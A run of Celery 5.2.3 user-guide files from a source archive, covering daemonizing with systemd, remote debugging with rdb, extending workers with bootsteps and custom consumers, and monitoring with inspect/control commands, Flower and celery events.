an example systemd file for Celery Beat: :file:`/etc/systemd/system/celerybeat.service`: .. 
code-block:: bash [Unit] Description=Celery Beat Service After=network.target [Service] Type=simple User=celery Group=celery EnvironmentFile=/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \ --pidfile=${CELERYBEAT_PID_FILE} \ --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}' Restart=always [Install] WantedBy=multi-user.target Once you've put that file in :file:`/etc/systemd/system`, you should run :command:`systemctl daemon-reload` in order that Systemd acknowledges that file. You should also run that command each time you modify it. Use :command:`systemctl enable celerybeat.service` if you want the celery beat service to automatically start when (re)booting the system. Running the worker with superuser privileges (root) ====================================================================== Running the worker with superuser privileges is a very dangerous practice. There should always be a workaround to avoid running as root. Celery may run arbitrary code in messages serialized with pickle - this is dangerous, especially when run as root. By default Celery won't run workers as root. The associated error message may not be visible in the logs but may be seen if :envvar:`C_FAKEFORK` is used. To force Celery to run workers as root use :envvar:`C_FORCE_ROOT`. When running as root without :envvar:`C_FORCE_ROOT` the worker will appear to start with *"OK"* but exit immediately after with no apparent errors. This problem may appear when running the project in a new development or production environment (inadvertently) as root. .. _daemon-supervisord: :pypi:`supervisor` ====================================================================== * `extra/supervisord/`_ .. _`extra/supervisord/`: https://github.com/celery/celery/tree/master/extra/supervisord/ .. _daemon-launchd: ``launchd`` (macOS) ====================================================================== * `extra/macOS`_ .. _`extra/macOS`: https://github.com/celery/celery/tree/master/extra/macOS/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/debugging.rst0000664000175000017500000000607300000000000020314 0ustar00asifasif00000000000000.. _guide-debugging: ====================================== Debugging ====================================== .. _tut-remote_debug: Debugging Tasks Remotely (using pdb) ==================================== Basics ------ :mod:`celery.contrib.rdb` is an extended version of :mod:`pdb` that enables remote debugging of processes that doesn't have terminal access. Example usage: .. code-block:: python from celery import task from celery.contrib import rdb @task() def add(x, y): result = x + y rdb.set_trace() # <- set break-point return result :func:`~celery.contrib.rdb.set_trace` sets a break-point at the current location and creates a socket you can telnet into to remotely debug your task. The debugger may be started by multiple processes at the same time, so rather than using a fixed port the debugger will search for an available port, starting from the base port (6900 by default). The base port can be changed using the environment variable :envvar:`CELERY_RDB_PORT`. By default the debugger will only be available from the local host, to enable access from the outside you have to set the environment variable :envvar:`CELERY_RDB_HOST`. When the worker encounters your break-point it'll log the following information: .. 
code-block:: text [INFO/MainProcess] Received task: tasks.add[d7261c71-4962-47e5-b342-2448bedd20e8] [WARNING/PoolWorker-1] Remote Debugger:6900: Please telnet 127.0.0.1 6900. Type `exit` in session to continue. [2011-01-18 14:25:44,119: WARNING/PoolWorker-1] Remote Debugger:6900: Waiting for client... If you telnet the port specified you'll be presented with a `pdb` shell: .. code-block:: console $ telnet localhost 6900 Connected to localhost. Escape character is '^]'. > /opt/devel/demoapp/tasks.py(128)add() -> return result (Pdb) Enter ``help`` to get a list of available commands, It may be a good idea to read the `Python Debugger Manual`_ if you have never used `pdb` before. To demonstrate, we'll read the value of the ``result`` variable, change it and continue execution of the task: .. code-block:: text (Pdb) result 4 (Pdb) result = 'hello from rdb' (Pdb) continue Connection closed by foreign host. The result of our vandalism can be seen in the worker logs: .. code-block:: text [2011-01-18 14:35:36,599: INFO/MainProcess] Task tasks.add[d7261c71-4962-47e5-b342-2448bedd20e8] succeeded in 61.481s: 'hello from rdb' .. _`Python Debugger Manual`: http://docs.python.org/library/pdb.html Tips ---- .. _breakpoint_signal: Enabling the break-point signal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If the environment variable :envvar:`CELERY_RDBSIG` is set, the worker will open up an rdb instance whenever the `SIGUSR2` signal is sent. This is the case for both main and worker processes. For example starting the worker with: .. code-block:: console $ CELERY_RDBSIG=1 celery worker -l INFO You can start an rdb session for any of the worker processes by executing: .. code-block:: console $ kill -USR2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/extending.rst0000664000175000017500000007255500000000000020356 0ustar00asifasif00000000000000.. _guide-extending: ========================== Extensions and Bootsteps ========================== .. contents:: :local: :depth: 2 .. _extending-custom-consumers: Custom Message Consumers ======================== You may want to embed custom Kombu consumers to manually process your messages. For that purpose a special :class:`~celery.bootstep.ConsumerStep` bootstep class exists, where you only need to define the ``get_consumers`` method, that must return a list of :class:`kombu.Consumer` objects to start whenever the connection is established: .. code-block:: python from celery import Celery from celery import bootsteps from kombu import Consumer, Exchange, Queue my_queue = Queue('custom', Exchange('custom'), 'routing_key') app = Celery(broker='amqp://') class MyConsumerStep(bootsteps.ConsumerStep): def get_consumers(self, channel): return [Consumer(channel, queues=[my_queue], callbacks=[self.handle_message], accept=['json'])] def handle_message(self, body, message): print('Received message: {0!r}'.format(body)) message.ack() app.steps['consumer'].add(MyConsumerStep) def send_me_a_message(who, producer=None): with app.producer_or_acquire(producer) as producer: producer.publish( {'hello': who}, serializer='json', exchange=my_queue.exchange, routing_key='routing_key', declare=[my_queue], retry=True, ) if __name__ == '__main__': send_me_a_message('world!') .. note:: Kombu Consumers can take use of two different message callback dispatching mechanisms. 
The first one is the ``callbacks`` argument that accepts a list of callbacks with a ``(body, message)`` signature, the second one is the ``on_message`` argument that takes a single callback with a ``(message,)`` signature. The latter won't automatically decode and deserialize the payload. .. code-block:: python def get_consumers(self, channel): return [Consumer(channel, queues=[my_queue], on_message=self.on_message)] def on_message(self, message): payload = message.decode() print( 'Received message: {0!r} {props!r} rawlen={s}'.format( payload, props=message.properties, s=len(message.body), )) message.ack() .. _extending-blueprints: Blueprints ========== Bootsteps is a technique to add functionality to the workers. A bootstep is a custom class that defines hooks to do custom actions at different stages in the worker. Every bootstep belongs to a blueprint, and the worker currently defines two blueprints: **Worker**, and **Consumer** ---------------------------------------------------------- **Figure A:** Bootsteps in the Worker and Consumer blueprints. Starting from the bottom up the first step in the worker blueprint is the Timer, and the last step is to start the Consumer blueprint, that then establishes the broker connection and starts consuming messages. .. figure:: ../images/worker_graph_full.png ---------------------------------------------------------- .. _extending-worker_blueprint: Worker ====== The Worker is the first blueprint to start, and with it starts major components like the event loop, processing pool, and the timer used for ETA tasks and other timed events. When the worker is fully started it continues with the Consumer blueprint, that sets up how tasks are executed, connects to the broker and starts the message consumers. The :class:`~celery.worker.WorkController` is the core worker implementation, and contains several methods and attributes that you can use in your bootstep. .. _extending-worker_blueprint-attributes: Attributes ---------- .. _extending-worker-app: .. attribute:: app The current app instance. .. _extending-worker-hostname: .. attribute:: hostname The workers node name (e.g., `worker1@example.com`) .. _extending-worker-blueprint: .. attribute:: blueprint This is the worker :class:`~celery.bootsteps.Blueprint`. .. _extending-worker-hub: .. attribute:: hub Event loop object (:class:`~kombu.asynchronous.Hub`). You can use this to register callbacks in the event loop. This is only supported by async I/O enabled transports (amqp, redis), in which case the `worker.use_eventloop` attribute should be set. Your worker bootstep must require the Hub bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Hub'} .. _extending-worker-pool: .. attribute:: pool The current process/eventlet/gevent/thread pool. See :class:`celery.concurrency.base.BasePool`. Your worker bootstep must require the Pool bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Pool'} .. _extending-worker-timer: .. attribute:: timer :class:`~kombu.asynchronous.timer.Timer` used to schedule functions. Your worker bootstep must require the Timer bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Timer'} .. _extending-worker-statedb: .. attribute:: statedb :class:`Database `` to persist state between worker restarts. This is only defined if the ``statedb`` argument is enabled. 
Your worker bootstep must require the ``Statedb`` bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Statedb'} .. _extending-worker-autoscaler: .. attribute:: autoscaler :class:`~celery.worker.autoscaler.Autoscaler` used to automatically grow and shrink the number of processes in the pool. This is only defined if the ``autoscale`` argument is enabled. Your worker bootstep must require the `Autoscaler` bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = ('celery.worker.autoscaler:Autoscaler',) .. _extending-worker-autoreloader: .. attribute:: autoreloader :class:`~celery.worker.autoreloder.Autoreloader` used to automatically reload use code when the file-system changes. This is only defined if the ``autoreload`` argument is enabled. Your worker bootstep must require the `Autoreloader` bootstep to use this; .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = ('celery.worker.autoreloader:Autoreloader',) Example worker bootstep ----------------------- An example Worker bootstep could be: .. code-block:: python from celery import bootsteps class ExampleWorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Pool'} def __init__(self, worker, **kwargs): print('Called when the WorkController instance is constructed') print('Arguments to WorkController: {0!r}'.format(kwargs)) def create(self, worker): # this method can be used to delegate the action methods # to another object that implements ``start`` and ``stop``. return self def start(self, worker): print('Called when the worker is started.') def stop(self, worker): print('Called when the worker shuts down.') def terminate(self, worker): print('Called when the worker terminates') Every method is passed the current ``WorkController`` instance as the first argument. Another example could use the timer to wake up at regular intervals: .. code-block:: python from celery import bootsteps class DeadlockDetection(bootsteps.StartStopStep): requires = {'celery.worker.components:Timer'} def __init__(self, worker, deadlock_timeout=3600): self.timeout = deadlock_timeout self.requests = [] self.tref = None def start(self, worker): # run every 30 seconds. self.tref = worker.timer.call_repeatedly( 30.0, self.detect, (worker,), priority=10, ) def stop(self, worker): if self.tref: self.tref.cancel() self.tref = None def detect(self, worker): # update active requests for req in worker.active_requests: if req.time_start and time() - req.time_start > self.timeout: raise SystemExit() Customizing Task Handling Logs ------------------------------ The Celery worker emits messages to the Python logging subsystem for various events throughout the lifecycle of a task. These messages can be customized by overriding the ``LOG_`` format strings which are defined in :file:`celery/app/trace.py`. For example: .. code-block:: python import celery.app.trace celery.app.trace.LOG_SUCCESS = "This is a custom message" The various format strings are all provided with the task name and ID for ``%`` formatting, and some of them receive extra fields like the return value or the exception which caused a task to fail. These fields can be used in custom format strings like so: .. code-block:: python import celery.app.trace celery.app.trace.LOG_REJECTED = "%(name)r is cursed and I won't run it: %(exc)s" .. 
_extending-consumer_blueprint: Consumer ======== The Consumer blueprint establishes a connection to the broker, and is restarted every time this connection is lost. Consumer bootsteps include the worker heartbeat, the remote control command consumer, and importantly, the task consumer. When you create consumer bootsteps you must take into account that it must be possible to restart your blueprint. An additional 'shutdown' method is defined for consumer bootsteps, this method is called when the worker is shutdown. .. _extending-consumer-attributes: Attributes ---------- .. _extending-consumer-app: .. attribute:: app The current app instance. .. _extending-consumer-controller: .. attribute:: controller The parent :class:`~@WorkController` object that created this consumer. .. _extending-consumer-hostname: .. attribute:: hostname The workers node name (e.g., `worker1@example.com`) .. _extending-consumer-blueprint: .. attribute:: blueprint This is the worker :class:`~celery.bootsteps.Blueprint`. .. _extending-consumer-hub: .. attribute:: hub Event loop object (:class:`~kombu.asynchronous.Hub`). You can use this to register callbacks in the event loop. This is only supported by async I/O enabled transports (amqp, redis), in which case the `worker.use_eventloop` attribute should be set. Your worker bootstep must require the Hub bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Hub'} .. _extending-consumer-connection: .. attribute:: connection The current broker connection (:class:`kombu.Connection`). A consumer bootstep must require the 'Connection' bootstep to use this: .. code-block:: python class Step(bootsteps.StartStopStep): requires = {'celery.worker.consumer.connection:Connection'} .. _extending-consumer-event_dispatcher: .. attribute:: event_dispatcher A :class:`@events.Dispatcher` object that can be used to send events. A consumer bootstep must require the `Events` bootstep to use this. .. code-block:: python class Step(bootsteps.StartStopStep): requires = {'celery.worker.consumer.events:Events'} .. _extending-consumer-gossip: .. attribute:: gossip Worker to worker broadcast communication (:class:`~celery.worker.consumer.gossip.Gossip`). A consumer bootstep must require the `Gossip` bootstep to use this. .. code-block:: python class RatelimitStep(bootsteps.StartStopStep): """Rate limit tasks based on the number of workers in the cluster.""" requires = {'celery.worker.consumer.gossip:Gossip'} def start(self, c): self.c = c self.c.gossip.on.node_join.add(self.on_cluster_size_change) self.c.gossip.on.node_leave.add(self.on_cluster_size_change) self.c.gossip.on.node_lost.add(self.on_node_lost) self.tasks = [ self.app.tasks['proj.tasks.add'] self.app.tasks['proj.tasks.mul'] ] self.last_size = None def on_cluster_size_change(self, worker): cluster_size = len(list(self.c.gossip.state.alive_workers())) if cluster_size != self.last_size: for task in self.tasks: task.rate_limit = 1.0 / cluster_size self.c.reset_rate_limits() self.last_size = cluster_size def on_node_lost(self, worker): # may have processed heartbeat too late, so wake up soon # in order to see if the worker recovered. self.c.timer.call_after(10.0, self.on_cluster_size_change) **Callbacks** - `` gossip.on.node_join`` Called whenever a new node joins the cluster, providing a :class:`~celery.events.state.Worker` instance. 
- `` gossip.on.node_leave`` Called whenever a new node leaves the cluster (shuts down), providing a :class:`~celery.events.state.Worker` instance. - `` gossip.on.node_lost`` Called whenever heartbeat was missed for a worker instance in the cluster (heartbeat not received or processed in time), providing a :class:`~celery.events.state.Worker` instance. This doesn't necessarily mean the worker is actually offline, so use a time out mechanism if the default heartbeat timeout isn't sufficient. .. _extending-consumer-pool: .. attribute:: pool The current process/eventlet/gevent/thread pool. See :class:`celery.concurrency.base.BasePool`. .. _extending-consumer-timer: .. attribute:: timer :class:`Timer >> app = Celery() >>> app.steps['worker'].add(MyWorkerStep) # < add class, don't instantiate >>> app.steps['consumer'].add(MyConsumerStep) >>> app.steps['consumer'].update([StepA, StepB]) >>> app.steps['consumer'] {step:proj.StepB{()}, step:proj.MyConsumerStep{()}, step:proj.StepA{()} The order of steps isn't important here as the order is decided by the resulting dependency graph (``Step.requires``). To illustrate how you can install bootsteps and how they work, this is an example step that prints some useless debugging information. It can be added both as a worker and consumer bootstep: .. code-block:: python from celery import Celery from celery import bootsteps class InfoStep(bootsteps.Step): def __init__(self, parent, **kwargs): # here we can prepare the Worker/Consumer object # in any way we want, set attribute defaults, and so on. print('{0!r} is in init'.format(parent)) def start(self, parent): # our step is started together with all other Worker/Consumer # bootsteps. print('{0!r} is starting'.format(parent)) def stop(self, parent): # the Consumer calls stop every time the consumer is # restarted (i.e., connection is lost) and also at shutdown. # The Worker will call stop at shutdown only. print('{0!r} is stopping'.format(parent)) def shutdown(self, parent): # shutdown is called by the Consumer at shutdown, it's not # called by Worker. print('{0!r} is shutting down'.format(parent)) app = Celery(broker='amqp://') app.steps['worker'].add(InfoStep) app.steps['consumer'].add(InfoStep) Starting the worker with this step installed will give us the following logs: .. code-block:: text is in init is in init [2013-05-29 16:18:20,544: WARNING/MainProcess] is starting [2013-05-29 16:18:21,577: WARNING/MainProcess] is starting is stopping is stopping is shutting down The ``print`` statements will be redirected to the logging subsystem after the worker has been initialized, so the "is starting" lines are time-stamped. You may notice that this does no longer happen at shutdown, this is because the ``stop`` and ``shutdown`` methods are called inside a *signal handler*, and it's not safe to use logging inside such a handler. Logging with the Python logging module isn't :term:`reentrant`: meaning you cannot interrupt the function then call it again later. It's important that the ``stop`` and ``shutdown`` methods you write is also :term:`reentrant`. Starting the worker with :option:`--loglevel=debug ` will show us more information about the boot process: .. code-block:: text [2013-05-29 16:18:20,509: DEBUG/MainProcess] | Worker: Preparing bootsteps. [2013-05-29 16:18:20,511: DEBUG/MainProcess] | Worker: Building graph... 
is in init [2013-05-29 16:18:20,511: DEBUG/MainProcess] | Worker: New boot order: {Hub, Pool, Timer, StateDB, Autoscaler, InfoStep, Beat, Consumer} [2013-05-29 16:18:20,514: DEBUG/MainProcess] | Consumer: Preparing bootsteps. [2013-05-29 16:18:20,514: DEBUG/MainProcess] | Consumer: Building graph... is in init [2013-05-29 16:18:20,515: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Mingle, Events, Gossip, InfoStep, Agent, Heart, Control, Tasks, event loop} [2013-05-29 16:18:20,522: DEBUG/MainProcess] | Worker: Starting Hub [2013-05-29 16:18:20,522: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,522: DEBUG/MainProcess] | Worker: Starting Pool [2013-05-29 16:18:20,542: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,543: DEBUG/MainProcess] | Worker: Starting InfoStep [2013-05-29 16:18:20,544: WARNING/MainProcess] is starting [2013-05-29 16:18:20,544: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,544: DEBUG/MainProcess] | Worker: Starting Consumer [2013-05-29 16:18:20,544: DEBUG/MainProcess] | Consumer: Starting Connection [2013-05-29 16:18:20,559: INFO/MainProcess] Connected to amqp://guest@127.0.0.1:5672// [2013-05-29 16:18:20,560: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,560: DEBUG/MainProcess] | Consumer: Starting Mingle [2013-05-29 16:18:20,560: INFO/MainProcess] mingle: searching for neighbors [2013-05-29 16:18:21,570: INFO/MainProcess] mingle: no one here [2013-05-29 16:18:21,570: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,571: DEBUG/MainProcess] | Consumer: Starting Events [2013-05-29 16:18:21,572: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,572: DEBUG/MainProcess] | Consumer: Starting Gossip [2013-05-29 16:18:21,577: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,577: DEBUG/MainProcess] | Consumer: Starting InfoStep [2013-05-29 16:18:21,577: WARNING/MainProcess] is starting [2013-05-29 16:18:21,578: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,578: DEBUG/MainProcess] | Consumer: Starting Heart [2013-05-29 16:18:21,579: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,579: DEBUG/MainProcess] | Consumer: Starting Control [2013-05-29 16:18:21,583: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,583: DEBUG/MainProcess] | Consumer: Starting Tasks [2013-05-29 16:18:21,606: DEBUG/MainProcess] basic.qos: prefetch_count->80 [2013-05-29 16:18:21,606: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,606: DEBUG/MainProcess] | Consumer: Starting event loop [2013-05-29 16:18:21,608: WARNING/MainProcess] celery@example.com ready. .. _extending-programs: Command-line programs ===================== .. _extending-commandoptions: Adding new command-line options ------------------------------- .. _extending-command-options: Command-specific options ~~~~~~~~~~~~~~~~~~~~~~~~ You can add additional command-line options to the ``worker``, ``beat``, and ``events`` commands by modifying the :attr:`~@user_options` attribute of the application instance. Celery commands uses the :mod:`click` module to parse command-line arguments, and so to add custom arguments you need to add :class:`click.Option` instances to the relevant set. Example adding a custom option to the :program:`celery worker` command: .. code-block:: python from celery import Celery from click import Option app = Celery(broker='amqp://') app.user_options['worker'].add(Option(('--enable-my-option',), is_flag=True, help='Enable custom option.')) All bootsteps will now receive this argument as a keyword argument to ``Bootstep.__init__``: .. 
code-block:: python from celery import bootsteps class MyBootstep(bootsteps.Step): def __init__(self, parent, enable_my_option=False, **options): super().__init__(parent, **options) if enable_my_option: party() app.steps['worker'].add(MyBootstep) .. _extending-preload_options: Preload options ~~~~~~~~~~~~~~~ The :program:`celery` umbrella command supports the concept of 'preload options'. These are special options passed to all sub-commands. You can add new preload options, for example to specify a configuration template: .. code-block:: python from celery import Celery from celery import signals from click import Option app = Celery() app.user_options['preload'].add(Option(('-Z', '--template'), default='default', help='Configuration template to use.')) @signals.user_preload_options.connect def on_preload_parsed(options, **kwargs): use_template(options['template']) .. _extending-subcommands: Adding new :program:`celery` sub-commands ----------------------------------------- New commands can be added to the :program:`celery` umbrella command by using `setuptools entry-points`_. .. _`setuptools entry-points`: http://reinout.vanrees.org/weblog/2010/01/06/zest-releaser-entry-points.html Entry-points is special meta-data that can be added to your packages ``setup.py`` program, and then after installation, read from the system using the :mod:`pkg_resources` module. Celery recognizes ``celery.commands`` entry-points to install additional sub-commands, where the value of the entry-point must point to a valid click command. This is how the :pypi:`Flower` monitoring extension may add the :program:`celery flower` command, by adding an entry-point in :file:`setup.py`: .. code-block:: python setup( name='flower', entry_points={ 'celery.commands': [ 'flower = flower.command:flower', ], } ) The command definition is in two parts separated by the equal sign, where the first part is the name of the sub-command (flower), then the second part is the fully qualified symbol path to the function that implements the command: .. code-block:: text flower.command:flower The module path and the name of the attribute should be separated by colon as above. In the module :file:`flower/command.py`, the command function may be defined as the following: .. code-block:: python import click @click.command() @click.option('--port', default=8888, type=int, help='Webserver port') @click.option('--debug', is_flag=True) def flower(port, debug): print('Running our command') Worker API ========== :class:`~kombu.asynchronous.Hub` - The workers async event loop --------------------------------------------------------------- :supported transports: amqp, redis .. versionadded:: 3.0 The worker uses asynchronous I/O when the amqp or redis broker transports are used. The eventual goal is for all transports to use the event-loop, but that will take some time so other transports still use a threading-based solution. .. method:: hub.add(fd, callback, flags) .. method:: hub.add_reader(fd, callback, \*args) Add callback to be called when ``fd`` is readable. The callback will stay registered until explicitly removed using :meth:`hub.remove(fd) `, or the file descriptor is automatically discarded because it's no longer valid. Note that only one callback can be registered for any given file descriptor at a time, so calling ``add`` a second time will remove any callback that was previously registered for that file descriptor. 
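For instance, a worker bootstep that requires the Hub could register a reader callback for a descriptor it owns. The following is a minimal sketch rather than part of the official API reference: the socket pair and the ``PipeReaderStep`` name are purely illustrative, and only the documented ``hub.add_reader``/``hub.remove`` calls are assumed:

.. code-block:: python

    import socket

    from celery import Celery, bootsteps

    app = Celery(broker='amqp://')


    class PipeReaderStep(bootsteps.StartStopStep):
        """Toy bootstep that reacts whenever its socket becomes readable."""

        requires = {'celery.worker.components:Hub'}

        def __init__(self, worker, **kwargs):
            # socket pair used purely for illustration.
            self.rsock, self.wsock = socket.socketpair()

        def start(self, worker):
            # call on_readable(worker) whenever rsock has data to read.
            worker.hub.add_reader(self.rsock, self.on_readable, worker)

        def on_readable(self, worker):
            print('received: {0!r}'.format(self.rsock.recv(1024)))

        def stop(self, worker):
            # remove all callbacks registered for this descriptor.
            worker.hub.remove(self.rsock)
            self.rsock.close()
            self.wsock.close()


    app.steps['worker'].add(PipeReaderStep)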
A file descriptor is any file-like object that supports the ``fileno`` method, or it can be the file descriptor number (int). .. method:: hub.add_writer(fd, callback, \*args) Add callback to be called when ``fd`` is writable. See also notes for :meth:`hub.add_reader` above. .. method:: hub.remove(fd) Remove all callbacks for file descriptor ``fd`` from the loop. Timer - Scheduling events ------------------------- .. method:: timer.call_after(secs, callback, args=(), kwargs=(), priority=0) .. method:: timer.call_repeatedly(secs, callback, args=(), kwargs=(), priority=0) .. method:: timer.call_at(eta, callback, args=(), kwargs=(), priority=0) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/index.rst0000664000175000017500000000056400000000000017467 0ustar00asifasif00000000000000.. _guide: ============ User Guide ============ :Release: |version| :Date: |today| .. toctree:: :maxdepth: 1 application tasks calling canvas workers daemonizing periodic-tasks routing monitoring security optimizing debugging concurrency/index signals testing extending configuration sphinx ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/monitoring.rst0000664000175000017500000005250300000000000020545 0ustar00asifasif00000000000000.. _guide-monitoring: ================================= Monitoring and Management Guide ================================= .. contents:: :local: Introduction ============ There are several tools available to monitor and inspect Celery clusters. This document describes some of these, as well as features related to monitoring, like events and broadcast commands. .. _monitoring-workers: Workers ======= .. _monitoring-control: Management Command-line Utilities (``inspect``/``control``) ----------------------------------------------------------- :program:`celery` can also be used to inspect and manage worker nodes (and to some degree tasks). To list all the commands available do: .. code-block:: console $ celery --help or to get help for a specific command do: .. code-block:: console $ celery --help Commands ~~~~~~~~ * **shell**: Drop into a Python shell. The locals will include the ``celery`` variable: this is the current app. Also all known tasks will be automatically added to locals (unless the :option:`--without-tasks ` flag is set). Uses :pypi:`Ipython`, :pypi:`bpython`, or regular :program:`python` in that order if installed. You can force an implementation using :option:`--ipython `, :option:`--bpython `, or :option:`--python `. * **status**: List active nodes in this cluster .. code-block:: console $ celery -A proj status * **result**: Show the result of a task .. code-block:: console $ celery -A proj result -t tasks.add 4e196aa4-0141-4601-8138-7aa33db0f577 Note that you can omit the name of the task as long as the task doesn't use a custom result backend. * **purge**: Purge messages from all configured task queues. This command will remove all messages from queues configured in the :setting:`CELERY_QUEUES` setting: .. warning:: There's no undo for this operation, and messages will be permanently deleted! .. code-block:: console $ celery -A proj purge You can also specify the queues to purge using the `-Q` option: .. code-block:: console $ celery -A proj purge -Q celery,foo,bar and exclude queues from being purged using the `-X` option: .. 
code-block:: console $ celery -A proj purge -X celery * **inspect active**: List active tasks .. code-block:: console $ celery -A proj inspect active These are all the tasks that are currently being executed. * **inspect scheduled**: List scheduled ETA tasks .. code-block:: console $ celery -A proj inspect scheduled These are tasks reserved by the worker when they have an `eta` or `countdown` argument set. * **inspect reserved**: List reserved tasks .. code-block:: console $ celery -A proj inspect reserved This will list all tasks that have been prefetched by the worker, and is currently waiting to be executed (doesn't include tasks with an ETA value set). * **inspect revoked**: List history of revoked tasks .. code-block:: console $ celery -A proj inspect revoked * **inspect registered**: List registered tasks .. code-block:: console $ celery -A proj inspect registered * **inspect stats**: Show worker statistics (see :ref:`worker-statistics`) .. code-block:: console $ celery -A proj inspect stats * **inspect query_task**: Show information about task(s) by id. Any worker having a task in this set of ids reserved/active will respond with status and information. .. code-block:: console $ celery -A proj inspect query_task e9f6c8f0-fec9-4ae8-a8c6-cf8c8451d4f8 You can also query for information about multiple tasks: .. code-block:: console $ celery -A proj inspect query_task id1 id2 ... idN * **control enable_events**: Enable events .. code-block:: console $ celery -A proj control enable_events * **control disable_events**: Disable events .. code-block:: console $ celery -A proj control disable_events * **migrate**: Migrate tasks from one broker to another (**EXPERIMENTAL**). .. code-block:: console $ celery -A proj migrate redis://localhost amqp://localhost This command will migrate all the tasks on one broker to another. As this command is new and experimental you should be sure to have a backup of the data before proceeding. .. note:: All ``inspect`` and ``control`` commands supports a :option:`--timeout ` argument, This is the number of seconds to wait for responses. You may have to increase this timeout if you're not getting a response due to latency. .. _inspect-destination: Specifying destination nodes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By default the inspect and control commands operates on all workers. You can specify a single, or a list of workers by using the :option:`--destination ` argument: .. code-block:: console $ celery -A proj inspect -d w1@e.com,w2@e.com reserved $ celery -A proj control -d w1@e.com,w2@e.com enable_events .. _monitoring-flower: Flower: Real-time Celery web-monitor ------------------------------------ Flower is a real-time web based monitor and administration tool for Celery. It's under active development, but is already an essential tool. Being the recommended monitor for Celery, it obsoletes the Django-Admin monitor, ``celerymon`` and the ``ncurses`` based monitor. Flower is pronounced like "flow", but you can also use the botanical version if you prefer. 
Features ~~~~~~~~ - Real-time monitoring using Celery Events - Task progress and history - Ability to show task details (arguments, start time, run-time, and more) - Graphs and statistics - Remote Control - View worker status and statistics - Shutdown and restart worker instances - Control worker pool size and autoscale settings - View and modify the queues a worker instance consumes from - View currently running tasks - View scheduled tasks (ETA/countdown) - View reserved and revoked tasks - Apply time and rate limits - Configuration viewer - Revoke or terminate tasks - HTTP API - List workers - Shut down a worker - Restart worker’s pool - Grow worker’s pool - Shrink worker’s pool - Autoscale worker pool - Start consuming from a queue - Stop consuming from a queue - List tasks - List (seen) task types - Get a task info - Execute a task - Execute a task by name - Get a task result - Change soft and hard time limits for a task - Change rate limit for a task - Revoke a task - OpenID authentication **Screenshots** .. figure:: ../images/dashboard.png :width: 700px .. figure:: ../images/monitor.png :width: 700px More screenshots_: .. _screenshots: https://github.com/mher/flower/tree/master/docs/screenshots Usage ~~~~~ You can use pip to install Flower: .. code-block:: console $ pip install flower Running the flower command will start a web-server that you can visit: .. code-block:: console $ celery -A proj flower The default port is http://localhost:5555, but you can change this using the `--port`_ argument: .. _--port: https://flower.readthedocs.io/en/latest/config.html#port .. code-block:: console $ celery -A proj flower --port=5555 Broker URL can also be passed through the :option:`--broker ` argument : .. code-block:: console $ celery flower --broker=amqp://guest:guest@localhost:5672// or $ celery flower --broker=redis://guest:guest@localhost:6379/0 Then, you can visit flower in your web browser : .. code-block:: console $ open http://localhost:5555 Flower has many more features than are detailed here, including authorization options. Check out the `official documentation`_ for more information. .. _official documentation: https://flower.readthedocs.io/en/latest/ .. _monitoring-celeryev: celery events: Curses Monitor ----------------------------- .. versionadded:: 2.0 `celery events` is a simple curses monitor displaying task and worker history. You can inspect the result and traceback of tasks, and it also supports some management commands like rate limiting and shutting down workers. This monitor was started as a proof of concept, and you probably want to use Flower instead. Starting: .. code-block:: console $ celery -A proj events You should see a screen like: .. figure:: ../images/celeryevshotsm.jpg `celery events` is also used to start snapshot cameras (see :ref:`monitoring-snapshots`: .. code-block:: console $ celery -A proj events --camera= --frequency=1.0 and it includes a tool to dump events to :file:`stdout`: .. code-block:: console $ celery -A proj events --dump For a complete list of options use :option:`--help `: .. code-block:: console $ celery events --help .. _`celerymon`: https://github.com/celery/celerymon/ .. _monitoring-rabbitmq: RabbitMQ ======== To manage a Celery cluster it is important to know how RabbitMQ can be monitored. RabbitMQ ships with the `rabbitmqctl(1)`_ command, with this you can list queues, exchanges, bindings, queue lengths, the memory usage of each queue, as well as manage users, virtual hosts and their permissions. .. 
